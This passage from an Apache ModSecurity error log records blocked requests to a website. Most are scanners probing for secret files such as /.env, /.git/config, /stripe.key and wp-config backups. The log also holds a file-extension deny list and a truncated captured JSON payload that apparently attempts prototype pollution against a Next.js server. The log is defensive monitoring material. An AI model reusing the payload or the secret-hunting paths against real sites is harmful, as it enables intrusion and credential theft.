"/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "web.dev-unit.com"] [uri "/en"] [unique_id "abL6xcPmow5JZ74Q0YLM6gAAAMk"] [Thu Mar 12 23:56:19.091563 2026] [:error] [pid 808:tid 840] [client 74.7.243.228:32786] [client 74.7.243.228] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/en/services/dev-unit.com"] [unique_id "abM2g8Pmow5JZ74Q0YIKzgAAANY"], referer: https://web.dev-unit.com/en/services/dev-unit.com/ [Fri Mar 13 03:08:12.044094 2026] [autoindex:error] [pid 614:tid 771] [client 74.7.227.152:58100] AH01276: Cannot serve directory /home/id/dev-unit.com/devweb-lastV/public/storage/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.web.dev-unit.com/en/services/web-hosting [Fri Mar 13 03:08:21.355023 2026] [:error] [pid 614:tid 787] [client 74.7.227.152:42170] [client 74.7.227.152] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/dev-unit.com"] [unique_id "abNjhS81Pr86t76NLAi4jQAAARM"], referer: https://www.web.dev-unit.com/dev-unit.com/ [Fri Mar 13 03:08:25.636871 2026] [:error] [pid 614:tid 776] [client 74.7.227.152:42170] [client 74.7.227.152] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/en/services/dev-unit.com"] [unique_id "abNjiS81Pr86t76NLAi4qAAAAQg"], referer: https://www.web.dev-unit.com/en/services/dev-unit.com/ [Fri Mar 13 03:08:28.122194 2026] [:error] [pid 808:tid 833] [client 74.7.227.152:41802] [client 74.7.227.152] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/en/dev-unit.com"] [unique_id "abNjjMPmow5JZ74Q0YJOAwAAAM8"], referer: https://www.web.dev-unit.com/en/dev-unit.com/ [Fri Mar 13 03:08:28.338951 2026] [core:error] [pid 808:tid 819] [client 74.7.227.152:41802] AH10244: invalid URI path (/dev-style/js/%url%), referer: https://www.web.dev-unit.com/dev-style/js/jquery.magnific-popup.min.js [Sat Mar 14 14:40:44.381667 2026] [:error] [pid 4409:tid 4413] [client 194.180.48.253:38514] [client 194.180.48.253] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-20239"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "web.dev-unit.com"] [uri "/.git/config"] [unique_id "abVXTODqGyPowfV1U2YgugAAAYI"] [Tue Mar 17 05:09:30.545583 2026] [:error] [pid 14574:tid 14673] [client 172.71.172.178:9750] [client 172.71.172.178] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-2000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "web.dev-unit.com"] [uri "/.git/config"] [unique_id "abjF6t2uaKykHZ-mI9G0sgAAAIY"] [Tue Mar 17 05:09:30.546030 2026] [:error] [pid 14757:tid 14781] [client 172.71.172.179:12915] [client 172.71.172.179] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "web.dev-unit.com"] [uri "/.env"] [unique_id "abjF6qwh5ybto1MksbszUwAAANY"] [Tue Mar 17 05:09:30.546317 2026] [:error] [pid 14757:tid 14775] [client 172.71.172.178:9758] [client 172.71.172.178] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-2000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "web.dev-unit.com"] [uri "/.git/HEAD"] [unique_id "abjF6qwh5ybto1MksbszVAAAANA"] [Sat Mar 21 00:56:23.948446 2026] [authz_core:error] [pid 17713:tid 17791] [client 142.93.143.8:35854] AH01630: client denied by server configuration: /home/id/dev-unit.com/devweb-lastV/public/server-status [Sat Mar 21 00:56:24.334059 2026] [authz_core:error] [pid 17713:tid 17814] [client 165.227.39.235:39512] AH01630: client denied by server configuration: /home/id/dev-unit.com/devweb-lastV/public/server-status [Sat Mar 21 00:56:52.130389 2026] [:error] [pid 26363:tid 26419] [client 142.93.143.8:52926] [client 142.93.143.8] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".axd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/trace.axd"] [unique_id "ab3QtN4YyF1e-QDujo9p1wAAAVY"] [Sat Mar 21 00:56:54.212244 2026] [:error] [pid 26363:tid 26418] [client 165.227.39.235:45318] [client 165.227.39.235] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".axd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/trace.axd"] [unique_id "ab3Qtt4YyF1e-QDujo9p8wAAAVU"] [Sat Mar 21 00:56:58.603143 2026] [authz_core:error] [pid 26363:tid 26409] [client 165.227.84.14:37880] AH01630: client denied by server configuration: /home/id/dev-unit.com/devweb-lastV/public/server-status [Sat Mar 21 00:56:58.735109 2026] [authz_core:error] [pid 17713:tid 17805] [client 164.92.107.174:36692] AH01630: client denied by server configuration: /home/id/dev-unit.com/devweb-lastV/public/server-status [Sat Mar 21 00:57:28.153316 2026] [:error] [pid 26363:tid 26416] [client 165.227.84.14:40492] [client 165.227.84.14] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".axd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/trace.axd"] [unique_id "ab3Q2N4YyF1e-QDujo9rjAAAAVM"] [Sat Mar 21 00:57:28.710626 2026] [:error] [pid 17713:tid 17799] [client 164.92.107.174:34448] [client 164.92.107.174] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".axd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/trace.axd"] [unique_id "ab3Q2OWNdVzdR4d4e6Y8dAAAAQk"] [Sat Mar 21 01:04:47.990695 2026] [:error] [pid 26363:tid 26410] [client 185.177.72.50:37388] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/env.backup"] [unique_id "ab3Sj94YyF1e-QDujo986QAAAU0"] [Sat Mar 21 01:04:54.272975 2026] [:error] [pid 17713:tid 17807] [client 185.177.72.50:37472] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/wp-config.old"] [unique_id "ab3SluWNdVzdR4d4e6ZGgAAAARE"] [Sat Mar 21 01:04:54.596688 2026] [:error] [pid 14425:tid 14439] [client 185.177.72.50:40510] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/wp-content/debug.log"] [unique_id "ab3SlkMqeKc_GzeuAXARmwAAAMw"] [Sat Mar 21 01:04:55.922848 2026] [:error] [pid 17713:tid 17799] [client 185.177.72.50:37472] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.key"] [unique_id "ab3Sl-WNdVzdR4d4e6ZGqwAAAQk"] [Sat Mar 21 01:04:56.261511 2026] [:error] [pid 26363:tid 26402] [client 185.177.72.50:37434] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.log"] [unique_id "ab3SmN4YyF1e-QDujo991gAAAUU"] [Sat Mar 21 01:04:56.326471 2026] [:error] [pid 26363:tid 26407] [client 185.177.72.50:37434] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.conf"] [unique_id "ab3SmN4YyF1e-QDujo993QAAAUo"] [Sat Mar 21 01:04:56.349493 2026] [:error] [pid 26363:tid 26397] [client 185.177.72.50:37450] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.ini"] [unique_id "ab3SmN4YyF1e-QDujo993wAAAUA"] [Sat Mar 21 01:04:56.367571 2026] [:error] [pid 26363:tid 26404] [client 185.177.72.50:37562] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.bak"] [unique_id "ab3SmN4YyF1e-QDujo994QAAAUc"] [Sat Mar 21 01:04:56.447489 2026] [:error] [pid 26363:tid 26401] [client 185.177.72.50:37450] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.old"] [unique_id "ab3SmN4YyF1e-QDujo994gAAAUQ"] [Sat Mar 21 01:04:56.638063 2026] [:error] [pid 17713:tid 17809] [client 185.177.72.50:37550] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.backup"] [unique_id "ab3SmOWNdVzdR4d4e6ZGzQAAARM"] [Sat Mar 21 01:05:00.913315 2026] [:error] [pid 17713:tid 17804] [client 185.177.72.50:37576] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ 